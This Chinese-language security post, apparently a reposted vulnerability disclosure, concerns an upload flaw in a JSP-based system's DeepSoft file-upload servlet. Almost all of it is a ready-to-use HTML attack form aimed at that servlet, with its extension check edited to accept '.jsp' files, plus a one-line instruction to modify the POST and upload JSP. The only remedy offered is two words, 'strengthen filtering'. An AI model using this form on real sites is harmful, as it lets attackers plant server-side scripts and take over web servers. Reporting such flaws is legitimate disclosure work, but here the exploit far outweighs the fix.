作者:hackdn 转载注明 JSP+MSSQL的系统,国外应用广,出在注册上传上,过滤不严,修改下面POST,上传JSP <link rel=stylesheet href="/rs/rs.css"> <html> <body topmargin=10 leftmargin=10 onload="window.focus()"> <form name="form_upload" enctype="multipart/form-data" action=" http://www.2cto.com /servlet/DeepSoft.com.sys.COM_File_UPLOAD_process" method="post" target=_self> <table width=460 cellspacing=1 cellpadding=1 border=0 align=center valign=center> <tr id="tr_1"><td align=left><br> <span class="helptext" id="thiswmsg"></span> </td></tr> <tr id="tr_2"><td align=left nowrap><br> <!--<input type=file name=uploadfiel class=inputtext size="40">--> <input type=file name="uploadfiel" id="uploadfiel" class=inputtext size="70" onchange="changeSrc(this)"> <input type=button name=uploadbutton value="上传照片" onclick=javascript:submit_pro() class='inputtext'><br> <span id="wantupload">要上载的照片:</span><br> <img src="about:blank" id="img_obj1" alt="test" style="display:none"/> </td></tr> <tr id="tr_3"><td align=left nowrap> <span class="helptext" id="submit_msg"></span> </td></tr> <tr><td align=left nowrap><span id="picname"></span><br> <img id="img_obj" src=""> </td></tr> </table> <input type=hidden name=back_colums value="iemp_studlnk"> <input type=hidden name=directory value="homeinput/photo"> <input type=hidden name=shuoming value="请选择照片文件:允许的格式包括( jsp ,gif,jpg,jpeg,*.ai,*.psd),按[上传照片]键,上传成功后按[确定]即可。文件大小没有限制,只是[*.ai,*.psd]文件可能上传后无法显示而已。"> <input type=hidden name=servleturl value=""> <input name=lang type=hidden value="CN"> <input name=pic_name type=hidden value=""> </form> <script language=javascript> var syslan = document.form_upload.lang.value; if (syslan.toLowerCase( ) !="cn") { window.title = "upload"; thiswmsg.innerHTML="Please select picture file (ex *.jsp,*.gif,*.jpg ,*.jpeg,*.ai,*.psd )then press [upload]"; document.form_upload.uploadbutton.value="UPLOAD"; document.title = "Upload Photo" wantupload.innerHTML="The picture which wants to upload"; } else { window.title = "请选择照片文件"; thiswmsg.innerHTML="请选择照片文件:允许的格式包括(jsp,gif,jpg,jpeg,*.ai,*.psd),按[上传照片]键,上传成功后按[确定]即可。文件大小没有限制,只是[*.ai,*.psd]文件可能上传后无法显示而已。"; document.form_upload.uploadbutton.value="上传照片"; document.title = "上传照片" wantupload.innerHTML="要上载的照片:"; } if (document.form_upload.pic_name.value.length>3) { document.all.img_obj.src = document.form_upload.pic_name.value; if (syslan.toLowerCase( ) !="cn") picname.innerHTML="Uploaded Photo:"; else picname.innerHTML="已上载的照片:"; } else { document.all.img_obj.width=0; document.all.img_obj.height=0; } function submit_pro() { var fobj; var filenametext = ""; var lastdotpos = 0; var fileext = ""; fobj=document.form_upload; filenametext = fobj.uploadfiel.value; if ( filenametext == "") { if (syslan.toLowerCase( ) !="cn") { alert("please select picture,ex *.jsp,*.gif,*.jpg ,*.jpeg,*.ai,*.psd"); } else { alert("请选择要上载的资料,允许的格式包括(jsp,gif,jpg,jpeg,ai,psd)"); } return; } lastdotpos = filenametext.lastIndexOf("."); if ( lastdotpos <= 0 ) { if (syslan.toLowerCase( ) !="cn") { alert("please select picture,ex *.jsp,*.gif,*.jpg ,*.jpeg,*.ai,*.psd"); } else { alert("请选择要上载的资料,允许的格式包括(jsp,gif,jpg,jpeg,ai,psd)"); } return; } fileext = filenametext.substr(lastdotpos + 1,filenametext.length - lastdotpos).toLowerCase( ); if (fileext != "jsp" && fileext != "gif" && fileext != "jpg" && fileext != "jpeg" && fileext != "ai" && fileext != "psd") { if (syslan.toLowerCase( ) !="cn") { alert("please select picture,ex *.jsp,*.gif,*.jpg ,*.jpeg,*.ai,*.psd"); } else { alert("请选择要上载的资料,允许的格式包括(jsp,gif,jpg,jpeg,ai,psd)"); } return; } fobj.servleturl.value="/rs/photo_view.jsp"; if (syslan.toLowerCase( ) !="cn") { submit_msg.innerHTML="Uploading picture......."; } else { submit_msg.innerHTML="正在上传照片,请稍微候......."; } fobj.uploadbutton.disabled = true; // fobj.uploadfiel.disabled = true; fobj.submit(); } </script> <script type="text/javascript"> var oFileChecker = document.getElementById("img_obj1"); function changeSrc(filePicker) { oFileChecker.src = filePicker.value; } oFileChecker.onreadystatechange = function () { if (oFileChecker.readyState == "complete") { oFileChecker.style.display=""; checkSize(); } } function checkSize(){ var limits = 0 * 1024; var limitw = 0; if (limits==0 && limitw==0){ document.form_upload.uploadbutton.disabled = false; }else{ if (limits>0 && limitw==0){ if (oFileChecker.fileSize < limits ){ document.form_upload.uploadbutton.disabled = false; }else{ document.form_upload.uploadbutton.disabled = true; alert("请选择照片文件:允许的格式包括(jsp,gif,jpg,jpeg,*.ai,*.psd),按[上传照片]键,上传成功后按[确定]即可。文件大小没有限制,只是[*.ai,*.psd]文件可能上传后无法显示而已。"); } }else if (limits==0 && limitw>0){ if (oFileChecker.width < limitw){ document.form_upload.uploadbutton.disabled = false; }else{ document.form_upload.uploadbutton.disabled = true; alert("请选择照片文件:允许的格式包括(jsp,gif,jpg,jpeg,*.ai,*.psd),按[上传照片]键,上传成功后按[确定]即可。文件大小没有限制,只是[*.ai,*.psd]文件可能上传后无法显示而已。"); } }else if (limits>0 && limitw>0){ if (oFileChecker.fileSize < limits && oFileChecker.width < limitw){ document.form_upload.uploadbutton.disabled = false; }else{ document.form_upload.uploadbutton.disabled = true; alert("请选择照片文件:允许的格式包括(jsp,gif,jpg,jpeg,*.ai,*.psd),按[上传照片]键,上传成功后按[确定]即可。文件大小没有限制,只是[*.ai,*.psd]文件可能上传后无法显示而已。"); } } } } </script> </body> </ html > 修复方案 加强过滤
查看更多关于DeepSoft.com.sys.Servlet上传漏洞及修复 - 网站安全的详细内容...